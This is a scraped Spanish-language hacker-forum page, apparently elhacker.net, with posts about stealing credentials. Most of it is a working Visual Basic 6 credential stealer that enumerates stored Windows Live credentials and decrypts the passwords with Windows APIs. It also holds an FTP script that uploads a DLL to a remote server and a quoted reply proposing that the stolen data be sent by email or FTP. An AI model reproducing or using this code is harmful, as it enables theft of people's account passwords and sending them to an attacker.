Diria que esta bueno.... pero no entendi para que sirve

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú
Public Arch As String
Arch = Environ$("windir") & "\" & n4me.Text & ".php"
open pagina
usuario
password
binary
lcd C:\WINDOWS\
cd /nukje
mput NICO.dll
close
bye
Cita de: Elemental Code en 23 Abril 2011, 22:58 PM
para eso nukje manda emails o subi a un ftp, va a ser mas facil.
Ahora, si queres usar winsocks sin el ocx existe un wsock que usa las apis.
Busca seguro sale porque es muy conocido.
PD: Como averiguas las contraseñas, contraseñas de que? para que? (Robar es malo)
'codigo de karcrack - elhacker.net
Option Explicit
'KERNEL32
Private Declare Function GetProcessHeap Lib "KERNEL32" () As Long
'ADVAPI32
Private Declare Function CredEnumerateW Lib "ADVAPI32" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
'CRYPT32
Private Declare Function CryptUnprotectData Lib "CRYPT32" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As Long) As Long
'NTDLL
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal ProcessHandle As Long, ByVal BaseAddress As Long, ByVal pBuffer As Long, ByVal NumberOfBytesToWrite As Long, ByRef NumberOfBytesWritten As Long) As Long
Private Declare Function RtlFreeHeap Lib "NTDLL" (ByVal HeapHandle As Long, ByVal Flags As Long, ByVal MemoryPointer As Long) As Long
Private Type DATA_BLOB
cbData As Long
pbData As Long
End Type
Private Type ACCOUNT_INFO
sMail As String
sPassword As String
End Type
Private Function sMSN() As ACCOUNT_INFO()
Dim tTMP() As ACCOUNT_INFO
Dim i As Long
Dim x As Long
Dim lCount As Long
Dim lCred As Long
Dim lPtr As Long
Dim lUser As Long
Dim tBlobIn As DATA_BLOB
Dim bvGUID(4) As Currency
bvGUID(0) = 2814797012434.9527@
bvGUID(1) = 2139259215904.7791@
bvGUID(2) = 1632598244864.8297@
bvGUID(3) = 2842944080556.8622@
bvGUID(4) = 275.2573@
'bvGUID = "WindowsLive:name=*"
Call CredEnumerateW(VarPtr(bvGUID(0)), 0, lCount, lCred)
For i = 0 To lCount - 1
Call NtWriteVirtualMemory(-1, ByVal VarPtr(lPtr), ByVal lCred + (i * &H4), &H4, 0)
Call NtWriteVirtualMemory(-1, ByVal VarPtr(lUser), ByVal (lPtr + &H30), &H4, 0)
Call NtWriteVirtualMemory(-1, ByVal VarPtr(tBlobIn.cbData), ByVal (lPtr + &H18), &H8, 0)
Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, 0&)
If tBlobIn.cbData Then
ReDim Preserve tTMP(x)
With tTMP(x)
.sPassword = Space$(tBlobIn.cbData \ 2)
Call NtWriteVirtualMemory(-1, ByVal StrPtr(.sPassword), ByVal tBlobIn.pbData, tBlobIn.cbData, 0)
If Len(.sPassword) > 0 Then
.sMail = uReadStr(lUser)
End If
End With
x = x + 1
End If
Next i
Call RtlFreeHeap(GetProcessHeap(), 0, lCred)
sMSN = tTMP
End Function
Private Function uReadStr(ByVal lPtr As Long) As String
Dim iChar As Integer
Dim i As Long
Do
Call NtWriteVirtualMemory(-1, ByVal VarPtr(iChar), ByVal (lPtr + i * 2), 2, ByVal 0&)
i = i + 1
If iChar = 0 Then Exit Do
uReadStr = uReadStr & ChrW$(iChar)
Loop
End Function
Private Sub Command1_Click()
Dim i As Long
Dim x() As ACCOUNT_INFO
x = sMSN
For i = LBound(x) To UBound(x)
MsgBox x(i).sMail & " - " & x(i).sPassword
Next i
End Sub